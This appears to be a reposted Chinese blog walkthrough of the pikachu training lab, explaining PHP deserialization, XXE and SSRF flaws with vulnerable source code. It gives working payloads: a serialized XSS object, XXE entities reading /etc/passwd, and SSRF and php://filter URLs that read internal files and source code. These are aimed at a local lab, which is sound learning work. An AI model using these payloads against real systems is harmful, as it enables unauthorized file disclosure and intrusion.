zoukankan      html  css  js  c++  java
  • pikachu靶场-PHP反序列化、XXE、SSRF

    PHP反序列化

    一、概述

    在理解这个漏洞之前,需要先搞清楚php中的serialize(),unserialize()这两个函数

    序列化serialize()


    序列化通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象。

      class S{
            public $test="pikachu";
        }
        $s=new S(); //创建一个对象
        serialize($s); //把这个对象进行序列化
        序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";}
            O:代表object
            1:代表对象名字长度为一个字符
            S:对象的名称
            1:代表对象里面有一个变量
            s:数据类型
            4:变量名称的长度
            test:变量名称
            s:数据类型
            7:变量值的长度
            pikachu:变量值
        
    

      

    反序列化unserialize()


    就是把被序列化的字符串还原为对象,然后再接下来的代码中继续使用。

        $u=unserialize("O:1:"S":1:{s:4:"test";s:7:"pikachu";}");
        echo $u->test; //得到的结果为pikachu
    

      序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数就会导致安全问题。

      常见的几个魔法函数:
            __construct()当一个对象创建时被调用
    
            __destruct()当一个对象销毁时被调用
    
            __toString()当一个对象被当作一个字符串使用
    
            __sleep() 在对象在被序列化之前运行
    
            __wakeup将在序列化之后立即被调用
    
            漏洞举例:
    
            class S{
                var $test = "pikachu";
                function __destruct(){
                    echo $this->test;
                }
            }
            $s = $_GET['test'];
            @$unser = unserialize($a);
    
            payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
    
        
    

      

    二、PHP反序列化漏洞

    ①观察源码返现这里有个借口可以接受一个反序列化的对象,对传进来的参数没有进行任何过滤

     ②我们利用详细的代码生成一个反序列化的字符串。

    <?php
    class S{
    var $test = "<script>alert('xss')</script>";
    }
    echo '<br>';
    $a = new S();
    echo serialize($a);
    ?>
    

      ③新建文档,通过url访问

    我这里是localhost/pikachu-master/test.php

     ④我们右键查看页面源代码

     ⑤把<br>后的O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";} 复制放入关卡中,就可以进行XSS攻击了

     

    XXE

    一、概述

    XXE -"xml external entity injection"
    既"xml外部实体注入漏洞"。
    概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
    也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

    具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。
    现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
    以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。

     

    xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。 

    具体的关于xml实体的介绍,网络上有很多,自己动手先查一下。

    第一部分:XML声明部分
    <?xml version="1.0"?>

    第二部分:文档类型定义 DTD
    <!DOCTYPE note[
    <!--定义此文档是note类型的文档-->
    <!ENTITY entity-name SYSTEM "URI/URL">
    <!--外部实体声明-->
    ]>

    第三部分:文档元素
    <note>
    <to>Dave</to>
    <from>Tom</from>
    <head>Reminder</head>
    <body>You are a good man</body>
    </note>

    其中,DTD(Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部DTD现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。

    ① 内部申明DTD格式
    <!DOCTYPE 根元素 [元素申明]>

    ② 外部引用DTD格式
    <!DOCTYPE 根元素 SYSTEM "外部DTD的URI">

    ③ 引用公共DTD格式
    <!DOCTYPE 根元素 PUBLIC "DTD标识名" "公共DTD的URI">

    外部实体引用 Payload

    <?xml version="1.0"?>

    <!DOCTYPE ANY[
    <!ENTITY f SYSTEM "file:///etc/passwd">
    ]>

    <x>&f;</x>

    二、XXE漏洞

    ①先输入一个payload

    <?xml version = "1.0"?>
    <!DOCTYPE note [
    <!ENTITY hacker "ESHLkangi">
    ]>
    <name>&hacker;</name> 

     将我们定义的实体内容打印在了前端

    ②构造读取文件的payload

    <?xml version = "1.0"?>
    <!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///C://2.txt">
    ]>
    <x>&f;</x>

    SSRF

    一、概述

    SSRF(Server-Side Request Forgery:服务器端请求伪造)

    其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制
    导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据

    数据流:攻击者----->服务器---->目标地址

    根据后台使用的函数的不同,对应的影响和利用方法又有不一样

    PHP中下面函数的使用不当会导致SSRF:
    file_get_contents()
    fsockopen()
    curl_exec()

    如果一定要通过后台服务器远程去对用户指定("或者预埋在前端的请求")的地址进行资源请求,则请做好目标地址的过滤。 

    二、SSRE(curl)

    if(isset($_GET['url']) && $_GET['url'] != null){
    
        //接收前端URL没问题,但是要做好过滤,如果不做过滤,就会导致SSRF
        $URL = $_GET['url'];
        $CH = curl_init($URL);
        curl_setopt($CH, CURLOPT_HEADER, FALSE);
        curl_setopt($CH, CURLOPT_SSL_VERIFYPEER, FALSE);
        $RES = curl_exec($CH);
        curl_close($CH) ;
    //ssrf的问是:前端传进来的url被后台使用curl_exec()进行了请求,然后将请求的结果又返回给了前端。
    //除了http/https外,curl还支持一些其他的协议curl --version 可以查看其支持的协议,telnet
    //curl支持很多协议,有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDAP
        echo $RES;
    
    }
    

      

     

     我们发现在URL中发现了诗的来源,然后我在本机链接虚拟机的pikachu,更改URL访问了虚拟机pikachu-master下的1.txt文件,文件的内容为GOOD MAN

    URL:(虚拟机IP为192.168.233.138)

    http://192.168.233.138/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.233.138/pikachu-master/1.txt

     

    三、SSRF(file_get_content)

    我们接着点击链接,发现和刚才一样

    看一下源码

    //读取PHP文件的源码:php://filter/read=convert.base64-encode/resource=ssrf.php
    //内网请求:http://x.x.x.x/xx.index
    if(isset($_GET['file']) && $_GET['file'] !=null){
        $filename = $_GET['file'];
        $str = file_get_contents($filename);
        echo $str;
    }
    
    
    
    ?>
    

      

    与上面实验不同的是这个使用了file_get_contents  

     读取PHP文件的源码:php://filter/read=convert.base64-encode/resource=ssrf.php

    内网请求:http://x.x.x.x/xx.index

    那么file_get_contents里面带有php:// filter 我们用这个就可以来读取php源码

    我们构造这样的url

    localhost/pikachu-master/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=ssrf.php

  • 相关阅读:
    request常用的方法
    JS通过正则限制 input 输入框只能输入整数、小数(金额或者现金)
    基于云原生的秒杀系统设计思路
    html<input>输入框中各种正则表达式设置
    cursor:hand与cursor:pointer的区别介绍
    读入/输出优化
    手动扩栈,防止溢出
    快速乘(O(1))
    二分图若干性质
    康拓展开
  • 原文地址:https://www.cnblogs.com/c1047509362/p/12638672.html
Copyright © 2011-2022 走看看